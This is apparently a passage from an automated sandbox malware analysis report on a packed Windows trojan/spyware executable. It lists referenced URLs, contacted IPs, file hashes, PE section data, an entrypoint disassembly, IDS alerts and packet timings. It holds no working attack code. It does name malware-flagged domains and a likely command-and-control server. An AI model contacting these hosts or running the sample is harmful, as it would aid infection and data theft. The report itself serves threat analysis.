                                                                                                                                                                  https://recaptcha.net/recaptcha/;biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/discussions/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_alldp.icobiyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/stats/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://medal.tvbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://broadcast.st.dl.eccdnx.combiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/steam_refunds/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102C000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708363417.000000000102B000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://x1.c.lencr.org/0biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://x1.i.lencr.org/0biyhoksefdad.exe, 00000000.00000003.1485488887.0000000003D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbiyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pbiyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/workshop/biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://login.steampowered.com/biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allbiyhoksefdad.exe, 00000000.00000003.1490545194.00000000040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://store.steampowered.com/legal/biyhoksefdad.exe, 00000000.00000002.1710411586.0000000003C98000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707554024.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707996339.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://univerxes.shop/biyhoksefdad.exe, biyhoksefdad.exe, 00000000.00000003.1578076106.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1541790012.000000000101E000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1352384780.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1542359493.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://sterpickced.digital/zbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://sterpickced.digital/vbiyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://modelshiverd.icu/biyhoksefdad.exe, 00000000.00000002.1709366776.000000000102F000.00000004.00000020.00020000.00000000.sdmp, biyhoksefdad.exe, 00000000.00000003.1708261167.000000000102E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://univerxes.shop/?biyhoksefdad.exe, 00000000.00000003.1627352228.0000000001020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://recaptcha.netbiyhoksefdad.exe, 00000000.00000002.1709366776.0000000001021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://ac.ecosia.org?q=biyhoksefdad.exe, 00000000.00000003.1406363079.0000000003CA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://store.steampowered.com/biyhoksefdad.exe, 00000000.00000003.1707884474.0000000003CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        172.67.213.171
                                                                                                                                                                                                        		univerxes.shopUnited States
                                                                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                        104.73.234.102
                                                                                                                                                                                                        		steamcommunity.comUnited States
                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                        149.154.167.99
                                                                                                                                                                                                        		t.meUnited Kingdom
                                                                                                                                                                                                        		62041TELEGRAMRUfalse

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                        Analysis ID:1635456
                                                                                                                                                                                                        Start date and time:2025-03-11 17:28:08 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 6m 43s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:biyhoksefdad.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@11/3
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56, 150.171.27.10
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target biyhoksefdad.exe, PID 8332 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        12:29:05API Interceptor24x Sleep call for process: biyhoksefdad.exe modified

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        No created / dropped files found

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):7.990756822716716
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:biyhoksefdad.exe
                                                                                                                                                                                                        File size:1'312'768 bytes
                                                                                                                                                                                                        MD5:67af8a00aba060d6508df2389989d85d
                                                                                                                                                                                                        SHA1:455950022329a0fde1bd4c3e050f1635464cdb51
                                                                                                                                                                                                        SHA256:70870a58aa5a47c9cb1e913883e8c7e08fb49c9018dc08e05af3cad3dad203d8
                                                                                                                                                                                                        SHA512:54eaeecc53dc31b1d4b41d0dcc5b30cac6d29f601c8d9c0bee2cde2b430ad043476faa106e5faa40de3323ebae05eeb91ab2d899c1c4b96dd067e8cd484c9472
                                                                                                                                                                                                        SSDEEP:24576:7XH6QghP23MghHx6e3KVLYEbDsGM4hRAeXEm5UaZlnKKw3GQWGh:DHDgHuKVjfWmzDLlA
                                                                                                                                                                                                        TLSH:675533D5B3701D4BF12453F2E311DBB092AA3E3F909E9135C8516F8819E97A266BCB13
                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g............................V.............@...........................<...........@................................. 0.....

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x408456
                                                                                                                                                                                                        Entrypoint Section:
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x67C9DD0F [Thu Mar 6 17:36:15 2025 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:71cc5af9daad65e58c6f29c42cdf9201

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                                                                                        mov eax, 00401000h
                                                                                                                                                                                                        call 00007F539CB92F26h
                                                                                                                                                                                                        call far 5DE5h : 8B10C483h
                                                                                                                                                                                                        jmp 00007F539CF5104Fh
                                                                                                                                                                                                        or dh, dl
                                                                                                                                                                                                        sbb dword ptr [edi], esi
                                                                                                                                                                                                        sub byte ptr [eax+533F7B84h], 0000005Dh
                                                                                                                                                                                                        daa
                                                                                                                                                                                                        xchg byte ptr [ebp+0Ah], ah
                                                                                                                                                                                                        leave
                                                                                                                                                                                                        lodsd
                                                                                                                                                                                                        rcr byte ptr [ecx], cl
                                                                                                                                                                                                        sbb dword ptr [esi], FFFFFF96h
                                                                                                                                                                                                        pop es
                                                                                                                                                                                                        popfd
                                                                                                                                                                                                        xchg dword ptr [edx+ecx*4-6Ah], eax
                                                                                                                                                                                                        sar dword ptr [eax], cl
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        imul edx, dword ptr [ecx+ebp*4-397BDD2Fh], 00087645h
                                                                                                                                                                                                        and ecx, esi
                                                                                                                                                                                                        mov dl, 02h
                                                                                                                                                                                                        xchg esp, ebp
                                                                                                                                                                                                        wait
                                                                                                                                                                                                        xchg eax, edi
                                                                                                                                                                                                        imul esi, esi, 53AE3601h
                                                                                                                                                                                                        sbb dword ptr [ecx], 42510E9Ch
                                                                                                                                                                                                        cmp esp, esi
                                                                                                                                                                                                        jl 00007F539CB92EF1h
                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                        lodsd
                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                        cwde
                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                        loopne 00007F539CB92F7Ch
                                                                                                                                                                                                        test dword ptr [ebp+42C550A9h], ebx
                                                                                                                                                                                                        xchg byte ptr [edx+ebp+28CEF396h], ah
                                                                                                                                                                                                        cmpsb
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        retf
                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                        inc ebp
                                                                                                                                                                                                        or eax, 77B26CDCh
                                                                                                                                                                                                        mov byte ptr [8205ADFDh], al
                                                                                                                                                                                                        xchg byte ptr [ecx], ah
                                                                                                                                                                                                        dec ebx
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        pop es
                                                                                                                                                                                                        cmp ebx, ebx
                                                                                                                                                                                                        pop ss
                                                                                                                                                                                                        add al, FAh
                                                                                                                                                                                                        adc byte ptr [ebx-2E3D7015h], cl
                                                                                                                                                                                                        cmp ecx, dword ptr [edx-62h]
                                                                                                                                                                                                        test dword ptr [esi-770849BDh], ebp
                                                                                                                                                                                                        jnle 00007F539CB92ECFh
                                                                                                                                                                                                        or eax, C525222Fh
                                                                                                                                                                                                        mov edx, 1D746E9Bh
                                                                                                                                                                                                        mov seg?, word ptr [ebx+4Dh]

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e30200x214.data
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e30000xc.data
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        0x10000x500000x29c0061f1d06c138c4d3655ff92aa19931a1cFalse0.9997251590568862data7.998877241773601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        0x510000x30000x1000b0490695375783f9b22c64764b12a868False0.996337890625data7.929991287486017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        0x540000xd0000x3000533579c76e38e7498f201a4e4b5d0e13False0.978515625data7.936481889423268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        0x610000x40000x220092efe3b1e27ff59ad557785651862a3cFalse0.9801240808823529DOS executable (COM, 0x8C-variant)7.924636797507748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        0x650000x27e0000x2ba00362f0b3a491bbdea420c775f5a8a5060unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                        .data0x2e30000xe50000xe4c009dcdb363e1e3782c2ba1e11e88726c87False0.9970991290983606MacBinary, char. code 0x2e, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040, creator ' 0.', type ' 1.', 3682606 bytes "." , at 0x3831ae 15740974 bytes resource dBase III DBT, version number 0, next free block index 3027316, 1st item "\201\313\033\262\206%\343\307/\030\334z\224b\011\226\363\340\260\355M\370"7.983447049442333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                                                                                                                                                        user32.dllMessageBoxA
                                                                                                                                                                                                        advapi32.dllRegCloseKey
                                                                                                                                                                                                        oleaut32.dllSysFreeString
                                                                                                                                                                                                        gdi32.dllCreateFontA
                                                                                                                                                                                                        shell32.dllShellExecuteA
                                                                                                                                                                                                        version.dllGetFileVersionInfoA
                                                                                                                                                                                                        ole32.dllCoCreateInstance

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                        2025-03-11T17:29:05.556677+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708149.154.167.99443TCP
                                                                                                                                                                                                        2025-03-11T17:29:07.267963+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:09.470403+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:14.328987+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:18.163033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:22.334502+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:27.454739+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:31.085947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:35.252998+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718172.67.213.171443TCP
                                                                                                                                                                                                        2025-03-11T17:29:37.690865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549720104.73.234.102443TCP
                                                                                                                                                                                                        2025-03-11T17:29:41.054063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.73.234.102443TCP

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.403450012 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.403497934 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.403599977 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.405194998 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:03.405217886 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.556561947 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.556677103 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.609858990 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.609889984 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.610234976 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.658389091 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.856359005 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:05.904328108 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451387882 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451416969 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451425076 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451436043 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451493979 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451530933 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.451565027 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.453888893 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.453913927 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.453926086 CET49708443192.168.2.5149.154.167.99
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.453932047 CET44349708149.154.167.99192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.488225937 CET49709443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.488266945 CET44349709172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.488349915 CET49709443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.488672018 CET49709443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:06.488687992 CET44349709172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.267962933 CET49709443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.368697882 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.368753910 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.368869066 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.369174957 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:07.369189978 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.470307112 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.470402956 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.472110987 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.472127914 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.472456932 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.473980904 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.473999977 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:09.474077940 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.508961916 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.508999109 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.509023905 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.509042025 CET49710443192.168.2.5172.67.213.171
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.509064913 CET44349710172.67.213.171192.168.2.5
                                                                                                                                                                                                        Mar 11, 2025 17:29:10.509100914 CET49710443192.168.2.5172.67.213.171
